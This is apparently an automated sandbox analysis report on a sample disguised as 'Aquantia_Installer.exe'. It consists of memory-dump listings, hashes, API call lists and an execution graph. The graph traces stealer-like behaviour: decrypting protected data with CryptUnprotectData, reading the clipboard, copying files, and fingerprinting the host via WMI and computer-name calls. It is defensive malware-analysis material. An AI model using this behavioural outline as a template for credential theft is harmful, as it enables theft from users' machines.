                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 5a76fd693ef6c27ba531d866d5f96dcef350ced13a007ee5ee95ec3a7a3e51dc
                                                                        • Instruction ID: eb5063150edbc6443e343fc070da1e57e2bccb2c2df021ef14a85a42bcf9728e
                                                                        • Opcode Fuzzy Hash: 5a76fd693ef6c27ba531d866d5f96dcef350ced13a007ee5ee95ec3a7a3e51dc
                                                                        • Instruction Fuzzy Hash: 6DF0F836A11169FBCFA21ED6CD04E893F76EB1A6B1B044011FA1D85620C6368820EBE4
                                                                        APIs
                                                                        • _free.LIBCMT ref: 6CF318DD
                                                                          • Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
                                                                          • Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC
                                                                        • _free.LIBCMT ref: 6CF318F0
                                                                        • _free.LIBCMT ref: 6CF31901
                                                                        • _free.LIBCMT ref: 6CF31912
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 5b49e0742fd211298701c9e409518bf6cf2d30245b7015b857d1006f84bf18b0
                                                                        • Instruction ID: 313453ac5fd7d84c84a53b79f5b89777e171e6f8052961bb26df0e060000adcd
                                                                        • Opcode Fuzzy Hash: 5b49e0742fd211298701c9e409518bf6cf2d30245b7015b857d1006f84bf18b0
                                                                        • Instruction Fuzzy Hash: B0E04678E32230BADFD21FA0D8156AD3AB5EF4B6083441106F4088A712E732021A9FD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user\Desktop\Aquantia_Installer.exe
                                                                        • API String ID: 0-475832001
                                                                        • Opcode ID: e37f0b942ecf918cfde869293538ba9872a755a6aff0072e0a5dc85cf24ee037
                                                                        • Instruction ID: c341eef6dc0bc9204ee1aeade326b4ef73a4245a5fe88572509e9c4b98cbfd1b
                                                                        • Opcode Fuzzy Hash: e37f0b942ecf918cfde869293538ba9872a755a6aff0072e0a5dc85cf24ee037
                                                                        • Instruction Fuzzy Hash: D5416271E01224BBDB11CB99CD80ADEBBF8EF8A314B109066E419D7B41E771DA45CBE4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !%$+($YW$][
                                                                        • API String ID: 0-3547823768
                                                                        • Opcode ID: 4916304bb72508b20e9882bd0692e9cd1a56b0bca94c66996da5288eb0dd5e0b
                                                                        • Instruction ID: 4c26cdba996906c7df165e04627f7458abeb2a5988bb5b4381645d75cf1988a3
                                                                        • Opcode Fuzzy Hash: 4916304bb72508b20e9882bd0692e9cd1a56b0bca94c66996da5288eb0dd5e0b
                                                                        • Instruction Fuzzy Hash: 4A5123B25497819FE334CF61D88178BBAA2BBC2740F258D1CD5D95B354DB748446CF82

                                                                        Execution Graph

                                                                        Execution Coverage:9.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:26.1%
                                                                        Total number of Nodes:310
                                                                        Total number of Limit Nodes:9
                                                                        execution_graph 12678 2f8717b 12679 2f87193 12678->12679 12680 2f871aa GetUserDefaultUILanguage 12679->12680 12681 2f871df 12680->12681 12682 2f58cf0 12683 2f58cff 12682->12683 12684 2f58d07 SHGetSpecialFolderPathW 12683->12684 12685 2f58ef2 ExitProcess 12683->12685 12686 2f58d1d 12684->12686 12687 2f58d25 GetCurrentThreadId GetCurrentProcessId 12686->12687 12688 2f58eed 12686->12688 12690 2f58d51 GetForegroundWindow 12687->12690 12691 2f58d4d 12687->12691 12697 2f8e4b0 12688->12697 12692 2f58e38 12690->12692 12691->12690 12692->12688 12696 2f5ccf0 CoInitializeEx 12692->12696 12700 2f8fd70 12697->12700 12699 2f8e4b5 FreeLibrary 12699->12685 12701 2f8fd79 12700->12701 12701->12699 12702 2f8e6fd 12703 2f8e720 12702->12703 12703->12703 12704 2f8e7d5 GetForegroundWindow 12703->12704 12705 2f8e7e3 12704->12705 12706 2f8ee3d 12707 2f8ee50 12706->12707 12708 2f8eebe 12707->12708 12712 2f8e5b0 LdrInitializeThunk 12707->12712 12711 2f8e5b0 LdrInitializeThunk 12708->12711 12711->12708 12712->12708 12713 2f8b97f RtlAllocateHeap 12714 2f72a30 12715 2f72a3e 12714->12715 12719 2f72a80 12714->12719 12720 2f72b40 12715->12720 12717 2f72afc 12718 2f711f0 LdrInitializeThunk 12717->12718 12717->12719 12718->12719 12721 2f72b50 12720->12721 12721->12721 12724 2f90ea0 12721->12724 12723 2f72c4f 12725 2f90ec0 12724->12725 12726 2f90fee 12725->12726 12728 2f8e5b0 LdrInitializeThunk 12725->12728 12726->12723 12728->12726 12729 2f88f70 12731 2f88f90 12729->12731 12730 2f8900e 12733 2f890fe 12730->12733 12734 2f8909e 12730->12734 12737 2f8e5b0 LdrInitializeThunk 12730->12737 12731->12730 12738 2f8e5b0 LdrInitializeThunk 12731->12738 12734->12733 12739 2f8e5b0 LdrInitializeThunk 12734->12739 12737->12734 12738->12730 12739->12733 12740 2f5dda7 12741 2f5ddad 12740->12741 12742 2f5ddbc CoUninitialize 12741->12742 12743 2f5ddf0 12742->12743 12744 2f6aa63 12745 2f6aa68 12744->12745 12760 2f90d20 12745->12760 12747 2f6abdd 12748 2f6ac2b 12747->12748 12751 2f6ac6c 12747->12751 12754 2f6ad5e 12747->12754 12759 2f6ac7b 12747->12759 12772 2f91040 12747->12772 12748->12751 12748->12754 12756 2f6b00c 12748->12756 12748->12759 12776 2f91100 12748->12776 12751->12754 12751->12756 12751->12759 12782 2f8e5b0 LdrInitializeThunk 12751->12782 12753 2f6afe2 CryptUnprotectData 12753->12756 12753->12759 12754->12753 12754->12756 12755 2f6bab3 12764 2f8ba00 12755->12764 12756->12755 12756->12759 12783 2f89b20 12756->12783 12762 2f90d40 12760->12762 12761 2f90e4e 12761->12747 12762->12761 12792 2f8e5b0 LdrInitializeThunk 12762->12792 12765 2f8ba30 12764->12765 12768 2f8ba7e 12765->12768 12793 2f8e5b0 LdrInitializeThunk 12765->12793 12766 2f8bc3d 12766->12759 12768->12766 12771 2f8bb4f 12768->12771 12794 2f8e5b0 LdrInitializeThunk 12768->12794 12795 2f8b990 12771->12795 12774 2f91070 12772->12774 12773 2f910ae 12773->12748 12774->12773 12799 2f8e5b0 LdrInitializeThunk 12774->12799 12777 2f91130 12776->12777 12778 2f9116e 12777->12778 12800 2f8e5b0 LdrInitializeThunk 12777->12800 12778->12778 12779 2f91208 12778->12779 12801 2f8e5b0 LdrInitializeThunk 12778->12801 12779->12751 12782->12754 12802 2f913a0 12783->12802 12787 2f89b66 12790 2f89ba8 12787->12790 12814 2f91d20 12787->12814 12788 2f89c28 12788->12756 12790->12788 12820 2f8e5b0 LdrInitializeThunk 12790->12820 12792->12761 12793->12768 12794->12771 12796 2f8b9fa 12795->12796 12797 2f8b9a6 RtlFreeHeap 12795->12797 12796->12766 12797->12796 12799->12773 12800->12778 12801->12779 12803 2f913c0 12802->12803 12804 2f89b3c 12803->12804 12821 2f8e5b0 LdrInitializeThunk 12803->12821 12804->12788 12806 2f91750 12804->12806 12808 2f91780 12806->12808 12807 2f91a16 12807->12787 12811 2f917be 12808->12811 12822 2f8e5b0 LdrInitializeThunk 12808->12822 12810 2f8b990 RtlFreeHeap 12810->12807 12811->12807 12813 2f9186e 12811->12813 12823 2f8e5b0 LdrInitializeThunk 12811->12823 12813->12810 12813->12813 12815 2f91d2f 12814->12815 12817 2f91dde 12815->12817 12824 2f8e5b0 LdrInitializeThunk 12815->12824 12818 2f91f4f 12817->12818 12825 2f8e5b0 LdrInitializeThunk 12817->12825 12820->12788 12821->12804 12822->12811 12823->12813 12824->12817 12825->12818 12826 2f5cd23 CoInitializeSecurity 12827 2f6b3e1 12829 2f6b3f0 12827->12829 12828 2f6b550 12829->12828 12830 2f90ea0 LdrInitializeThunk 12829->12830 12830->12829 12831 2f8f0a0 12832 2f8efea 12831->12832 12832->12831 12832->12832 12833 2f8f10c 12832->12833 12836 2f8e5b0 LdrInitializeThunk 12832->12836 12835 2f8f12b 12836->12835 12838 2f5cd55 12839 2f5cd80 12838->12839 12842 2f89160 12839->12842 12841 2f5cdb8 12843 2f891c0 CoCreateInstance 12842->12843 12845 2f8927b SysAllocString 12843->12845 12846 2f896be 12843->12846 12849 2f89346 12845->12849 12848 2f896ce GetVolumeInformationW 12846->12848 12862 2f896ec 12848->12862 12850 2f89359 CoSetProxyBlanket 12849->12850 12851 2f896aa SysFreeString 12849->12851 12852 2f89379 SysAllocString 12850->12852 12853 2f896a0 12850->12853 12851->12846 12855 2f89470 12852->12855 12853->12851 12855->12855 12856 2f89497 SysAllocString 12855->12856 12859 2f894bf 12856->12859 12857 2f8968a SysFreeString SysFreeString 12857->12853 12858 2f89680 12858->12857 12859->12857 12859->12858 12860 2f8950a VariantInit 12859->12860 12863 2f89570 12860->12863 12861 2f8966f VariantClear 12861->12858 12862->12841 12863->12861 12864 2f7e596 12865 2f7e5d0 12864->12865 12866 2f7e6f5 GetPhysicallyInstalledSystemMemory 12865->12866 12867 2f7e719 12866->12867 12868 2f5d697 12869 2f5d730 12868->12869 12871 2f5d77e 12869->12871 12872 2f8e5b0 LdrInitializeThunk 12869->12872 12872->12871 12873 2f842dc 12874 2f842e1 12873->12874 12875 2f84314 GetSystemMetrics GetSystemMetrics 12874->12875 12876 2f84353 12875->12876 12882 2f5db5c 12884 2f5db80 12882->12884 12883 2f5dbde 12887 2f5dc7e 12883->12887 12955 2f8e5b0 LdrInitializeThunk 12883->12955 12884->12883 12954 2f8e5b0 LdrInitializeThunk 12884->12954 12900 2f75110 12887->12900 12889 2f5dce9 12906 2f75390 12889->12906 12891 2f5dd09 12914 2f76e10 12891->12914 12893 2f5dd29 12928 2f77780 12893->12928 12897 2f5dd3b 12956 2f83340 OpenClipboard 12897->12956 12901 2f750f0 12900->12901 12902 2f91750 2 API calls 12901->12902 12903 2f750dd 12901->12903 12904 2f752cf 12901->12904 12902->12901 12903->12889 12963 2f70fe0 12904->12963 12907 2f7539e 12906->12907 12907->12907 12908 2f913a0 LdrInitializeThunk 12907->12908 12912 2f750f0 12908->12912 12909 2f752cf 12913 2f70fe0 2 API calls 12909->12913 12910 2f91750 2 API calls 12910->12912 12911 2f750dd 12911->12891 12912->12909 12912->12910 12912->12911 12913->12911 12915 2f76e6b 12914->12915 12916 2f770a3 12914->12916 12921 2f770bf 12914->12921 12923 2f7724c 12914->12923 12915->12916 12919 2f913a0 LdrInitializeThunk 12915->12919 12915->12921 12915->12923 12926 2f773b3 12915->12926 12917 2f91750 2 API calls 12916->12917 12917->12921 12919->12915 12920 2f913a0 LdrInitializeThunk 12920->12921 12921->12920 12921->12923 12924 2f91d20 LdrInitializeThunk 12921->12924 12921->12926 12984 2f8e4d0 12921->12984 12991 2f914b0 12921->12991 13000 2f8e5b0 LdrInitializeThunk 12921->13000 12923->12893 12923->12923 12924->12921 12926->12923 12999 2f8e5b0 LdrInitializeThunk 12926->12999 12929 2f777b0 12928->12929 12932 2f777fe 12929->12932 13003 2f8e5b0 LdrInitializeThunk 12929->13003 12930 2f5dd32 12936 2f77c20 12930->12936 12932->12930 12935 2f778ee 12932->12935 13004 2f8e5b0 LdrInitializeThunk 12932->13004 12933 2f8b990 RtlFreeHeap 12933->12930 12935->12933 13005 2f77c40 12936->13005 12938 2f77c29 12938->12897 12939 2f89b20 2 API calls 12938->12939 12943 2f785c8 12939->12943 12940 2f90d20 LdrInitializeThunk 12940->12943 12941 2f91040 LdrInitializeThunk 12941->12943 12942 2f787d7 CopyFileW 12942->12943 12943->12940 12943->12941 12943->12942 12944 2f91100 LdrInitializeThunk 12943->12944 12945 2f789b2 12943->12945 12952 2f785db 12943->12952 12944->12943 12946 2f78dcc 12945->12946 12951 2f78a6e 12945->12951 13018 2f8e5b0 LdrInitializeThunk 12946->13018 12947 2f91040 LdrInitializeThunk 12947->12951 12949 2f78ddb 12950 2f90d20 LdrInitializeThunk 12950->12951 12951->12947 12951->12950 12951->12952 12953 2f91100 LdrInitializeThunk 12951->12953 12952->12897 12953->12951 12954->12883 12955->12887 12957 2f5dd8d 12956->12957 12958 2f83364 GetWindowLongW GetClipboardData 12956->12958 12959 2f8339b GlobalLock 12958->12959 12960 2f8349d CloseClipboard 12958->12960 12962 2f833b1 12959->12962 12960->12957 12961 2f8348f GlobalUnlock 12961->12960 12962->12961 12967 2f70ff0 12963->12967 12964 2f710db 12964->12903 12965 2f710cc 12965->12964 12969 2f72e30 12965->12969 12966 2f90ea0 LdrInitializeThunk 12966->12965 12967->12964 12967->12965 12967->12966 12970 2f90d20 LdrInitializeThunk 12969->12970 12971 2f72e70 12970->12971 12977 2f73685 12971->12977 12979 2f72f6a 12971->12979 12981 2f8e5b0 LdrInitializeThunk 12971->12981 12973 2f8b990 RtlFreeHeap 12974 2f735e3 12973->12974 12974->12977 12983 2f8e5b0 LdrInitializeThunk 12974->12983 12975 2f735d3 12975->12973 12977->12964 12979->12975 12980 2f8b990 RtlFreeHeap 12979->12980 12982 2f8e5b0 LdrInitializeThunk 12979->12982 12980->12979 12981->12971 12982->12979 12983->12974 12985 2f8e4fa RtlReAllocateHeap 12984->12985 12986 2f8e4ec 12984->12986 12987 2f8e58e 12984->12987 12990 2f8e583 12984->12990 12985->12990 12986->12985 12986->12987 12988 2f8b990 RtlFreeHeap 12987->12988 12988->12990 12990->12921 12992 2f914d0 12991->12992 12992->12992 12995 2f9150e 12992->12995 13001 2f8e5b0 LdrInitializeThunk 12992->13001 12993 2f91742 12993->12921 12995->12993 12998 2f9160e 12995->12998 13002 2f8e5b0 LdrInitializeThunk 12995->13002 12996 2f8b990 RtlFreeHeap 12996->12993 12998->12996 12998->12998 12999->12923 13000->12921 13001->12995 13002->12998 13003->12932 13004->12935 13006 2f77cb0 13005->13006 13006->13006 13007 2f8ba00 2 API calls 13006->13007 13009 2f77cf5 13007->13009 13008 2f8bc70 LdrInitializeThunk 13008->13009 13009->13008 13012 2f77e0a 13009->13012 13019 2f8c230 13009->13019 13016 2f78208 13012->13016 13017 2f77f77 13012->13017 13027 2f8c170 13012->13027 13013 2f78403 13015 2f8bdd0 LdrInitializeThunk 13013->13015 13015->13017 13016->13013 13016->13017 13031 2f8bdd0 13016->13031 13017->12938 13018->12949 13021 2f8c290 13019->13021 13020 2f8ca9e 13020->13009 13025 2f8c2de 13021->13025 13035 2f8e5b0 LdrInitializeThunk 13021->13035 13023 2f8ca0a 13023->13020 13036 2f8e5b0 LdrInitializeThunk 13023->13036 13025->13020 13025->13023 13026 2f8e5b0 LdrInitializeThunk 13025->13026 13026->13025 13028 2f8c1a0 13027->13028 13028->13028 13029 2f8c1fe 13028->13029 13037 2f8e5b0 LdrInitializeThunk 13028->13037 13029->13012 13032 2f8be58 13031->13032 13033 2f8bdda 13031->13033 13032->13013 13033->13032 13038 2f8e5b0 LdrInitializeThunk 13033->13038 13035->13025 13036->13020 13037->13029 13038->13032 13044 2f8f209 13045 2f8f240 13044->13045 13046 2f8f2ae 13045->13046 13051 2f8e5b0 LdrInitializeThunk 13045->13051 13050 2f8e5b0 LdrInitializeThunk 13046->13050 13049 2f8f3d2 13050->13049 13051->13046 13052 2f7fec1 CoSetProxyBlanket 13053 2f5da83 13054 2f5dab0 13053->13054 13054->13054 13055 2f5daff 13054->13055 13057 2f8e5b0 LdrInitializeThunk 13054->13057 13057->13055 13058 2f7dec9 13060 2f7def1 13058->13060 13059 2f7dfcb FreeLibrary 13066 2f90350 13059->13066 13060->13059 13060->13060 13063 2f7e040 GetComputerNameExA 13065 2f7e130 13063->13065 13065->13065 13067 2f7dfed GetComputerNameExA 13066->13067 13067->13063 13068 2f8e8c6 13069 2f8e910 13068->13069 13070 2f8ea4e 13069->13070 13072 2f8e5b0 LdrInitializeThunk 13069->13072 13072->13070 13073 2f74b09 13074 2f74b10 13073->13074 13075 2f90ea0 LdrInitializeThunk 13074->13075 13078 2f74b41 13074->13078 13080 2f74c91 13075->13080 13076 2f74e07 13077 2f72e30 2 API calls 13076->13077 13076->13078 13077->13078 13078->13078 13079 2f74df1 GetLogicalDrives 13081 2f90ea0 LdrInitializeThunk 13079->13081 13080->13076 13080->13078 13080->13079 13080->13080 13081->13076

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 2f89160-2f891b3 1 2f891c0-2f891fc 0->1 1->1 2 2f891fe-2f8921a 1->2 4 2f8921c 2->4 5 2f89227-2f89275 CoCreateInstance 2->5 4->5 6 2f8927b-2f892ba 5->6 7 2f896be-2f896ea call 2f90350 GetVolumeInformationW 5->7 8 2f892c0-2f89316 6->8 12 2f896ec 7->12 13 2f896ee-2f89715 call 2f6fec0 7->13 8->8 10 2f89318-2f89353 SysAllocString 8->10 16 2f89359-2f89373 CoSetProxyBlanket 10->16 17 2f896aa-2f896ba SysFreeString 10->17 12->13 19 2f89720-2f8972b 13->19 20 2f89379-2f8939f 16->20 21 2f896a0-2f896a6 16->21 17->7 19->19 22 2f8972d-2f89739 19->22 23 2f893a0-2f893dd 20->23 21->17 24 2f8974b-2f89782 call 2f6fec0 22->24 25 2f8973b-2f89748 call 2f58680 22->25 23->23 26 2f893df-2f89467 SysAllocString 23->26 33 2f89790-2f8979b 24->33 25->24 29 2f89470-2f89495 26->29 29->29 32 2f89497-2f894c8 SysAllocString 29->32 38 2f8968a-2f8969c SysFreeString * 2 32->38 39 2f894ce-2f894f0 32->39 33->33 34 2f8979d-2f897a9 33->34 36 2f897bb-2f897f2 call 2f6fec0 34->36 37 2f897ab-2f897b8 call 2f58680 34->37 45 2f89800-2f8980b 36->45 37->36 38->21 46 2f89680-2f89686 39->46 47 2f894f6-2f894f9 39->47 45->45 48 2f8980d-2f89819 45->48 46->38 47->46 49 2f894ff-2f89504 47->49 50 2f8982b-2f8985f call 2f6fec0 48->50 51 2f8981b-2f89828 call 2f58680 48->51 49->46 52 2f8950a-2f89562 VariantInit 49->52 59 2f89860-2f8986b 50->59 51->50 54 2f89570-2f89589 52->54 54->54 57 2f8958b-2f8959d 54->57 60 2f895a1-2f895a7 57->60 59->59 61 2f8986d-2f89879 59->61 62 2f895ad-2f895b3 60->62 63 2f8966f-2f8967c VariantClear 60->63 64 2f8988b-2f89892 61->64 65 2f8987b-2f89888 call 2f58680 61->65 62->63 66 2f895b9-2f895c7 62->66 63->46 65->64 68 2f895c9-2f895ce 66->68 69 2f89605 66->69 72 2f895dc-2f895e0 68->72 71 2f89607-2f8962f call 2f584d0 call 2f59310 69->71 83 2f89631 71->83 84 2f89636-2f89641 71->84 74 2f895d0 72->74 75 2f895e2-2f895eb 72->75 77 2f895d1-2f895da 74->77 78 2f895fa-2f895fe 75->78 79 2f895ed-2f895f8 75->79 77->71 77->72 78->77 80 2f89600-2f89603 78->80 79->77 80->77 83->84 85 2f89648-2f8966b call 2f58500 call 2f584e0 84->85 86 2f89643 84->86 85->63 86->85
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(02F94678,00000000,00000001,02F94668,00000000), ref: 02F8926D
                                                                        • SysAllocString.OLEAUT32(97259936), ref: 02F8931D
                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02F8936B
                                                                        • SysAllocString.OLEAUT32(31ED3FD5), ref: 02F893E4
                                                                        • SysAllocString.OLEAUT32(59015B11), ref: 02F8949C
                                                                        • VariantInit.OLEAUT32(?), ref: 02F8950F
                                                                        • VariantClear.OLEAUT32(?), ref: 02F89670
                                                                        • SysFreeString.OLEAUT32(?), ref: 02F89694
                                                                        • SysFreeString.OLEAUT32(?), ref: 02F8969A
                                                                        • SysFreeString.OLEAUT32(?), ref: 02F896AE
                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,B1FB8FAB,00000000,00000000,00000000,00000000), ref: 02F896E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                        • String ID: 0W(U$C$\$325
                                                                        • API String ID: 2573436264-3066721790
                                                                        • Opcode ID: 536b745a67ee3344744de2ae5f648c4c541e7a43988cd5307827e75074a10918
                                                                        • Instruction ID: 100aa301d2e14bfb3b9c32088bd583b3923ad31d6b9a7abe1aef6c5364957e65
                                                                        • Opcode Fuzzy Hash: 536b745a67ee3344744de2ae5f648c4c541e7a43988cd5307827e75074a10918
                                                                        • Instruction Fuzzy Hash: 3A122271A083409BD714DF64CC85B6BBBE5EB84794F048A2CFA95AB3C0D7B4D905CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AC$8?=5$93<4$<0$PZ$RXRQ$UM$`o$tx$v$y~yx
                                                                        • API String ID: 0-3367581349
                                                                        • Opcode ID: 53e6a3dbc55546d736a21b4e89aec0cdafa0f307e32677a1582fea2e6bd3a015
                                                                        • Instruction ID: d9faac5f0e5caa400b19712967c8515b3b0944064113ed8e3ebe7b2dfd567d12
                                                                        • Opcode Fuzzy Hash: 53e6a3dbc55546d736a21b4e89aec0cdafa0f307e32677a1582fea2e6bd3a015
                                                                        • Instruction Fuzzy Hash: 47820FB19083808BD3358F24D8957EFB7E1FF95394F088A2CD6CA9B291E7749541CB92

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 331 2f7dec9-2f7df2f call 2f90350 335 2f7df30-2f7df81 331->335 335->335 336 2f7df83-2f7df8c 335->336 337 2f7df8e-2f7df94 336->337 338 2f7dfab-2f7dfb7 336->338 339 2f7dfa0-2f7dfa9 337->339 340 2f7dfcb-2f7e03a FreeLibrary call 2f90350 GetComputerNameExA 338->340 341 2f7dfb9-2f7dfbf 338->341 339->338 339->339 345 2f7e040-2f7e074 340->345 342 2f7dfc0-2f7dfc9 341->342 342->340 342->342 345->345 346 2f7e076-2f7e07f 345->346 347 2f7e081-2f7e08a 346->347 348 2f7e09d-2f7e0a0 346->348 349 2f7e090-2f7e099 347->349 350 2f7e0a6-2f7e0b2 348->350 349->349 351 2f7e09b 349->351 352 2f7e0b4-2f7e0ba 350->352 353 2f7e0cb-2f7e127 GetComputerNameExA 350->353 351->350 354 2f7e0c0-2f7e0c9 352->354 355 2f7e130-2f7e14d 353->355 354->353 354->354 355->355 356 2f7e14f-2f7e158 355->356 357 2f7e16b-2f7e177 356->357 358 2f7e15a 356->358 360 2f7e18b-2f7e1e6 357->360 361 2f7e179-2f7e17f 357->361 359 2f7e160-2f7e169 358->359 359->357 359->359 364 2f7e1f0-2f7e248 360->364 362 2f7e180-2f7e189 361->362 362->360 362->362 364->364 365 2f7e24a-2f7e253 364->365 366 2f7e255-2f7e25b 365->366 367 2f7e26b-2f7e277 365->367 370 2f7e260-2f7e269 366->370 368 2f7e28b-2f7e2f2 call 2f90350 367->368 369 2f7e279-2f7e27f 367->369 375 2f7e300-2f7e339 368->375 371 2f7e280-2f7e289 369->371 370->367 370->370 371->368 371->371 375->375 376 2f7e33b-2f7e344 375->376 377 2f7e346-2f7e34f 376->377 378 2f7e35d 376->378 379 2f7e350-2f7e359 377->379 380 2f7e360-2f7e372 378->380 379->379 381 2f7e35b 379->381 382 2f7e4b3-2f7e4f1 380->382 383 2f7e378-2f7e37f 380->383 381->380 385 2f7e500-2f7e544 382->385 384 2f7e380-2f7e38c 383->384 386 2f7e3a0-2f7e3a6 384->386 387 2f7e38e-2f7e393 384->387 385->385 388 2f7e546-2f7e554 385->388 390 2f7e3f0-2f7e3fc 386->390 391 2f7e3a8-2f7e3ab 386->391 389 2f7e3c2 387->389 392 2f7e556-2f7e55f 388->392 393 2f7e56b-2f7e56e call 2f81820 388->393 395 2f7e3c4-2f7e3d4 389->395 398 2f7e461-2f7e469 390->398 399 2f7e3fe-2f7e401 390->399 391->390 394 2f7e3ad-2f7e3bf 391->394 396 2f7e560-2f7e569 392->396 401 2f7e573-2f7e592 393->401 394->389 400 2f7e3d6-2f7e3df 395->400 396->393 396->396 403 2f7e472-2f7e475 398->403 404 2f7e46b-2f7e46d 398->404 399->398 402 2f7e403-2f7e45c 399->402 400->382 407 2f7e3e5-2f7e3e7 400->407 402->395 405 2f7e477-2f7e4a7 403->405 406 2f7e4ac-2f7e4ae 403->406 404->400 405->389 406->389 407->384 408 2f7e3e9 407->408 408->382
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?), ref: 02F7DFD7
                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02F7E00D
                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 02F7E0E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: ComputerName$FreeLibrary
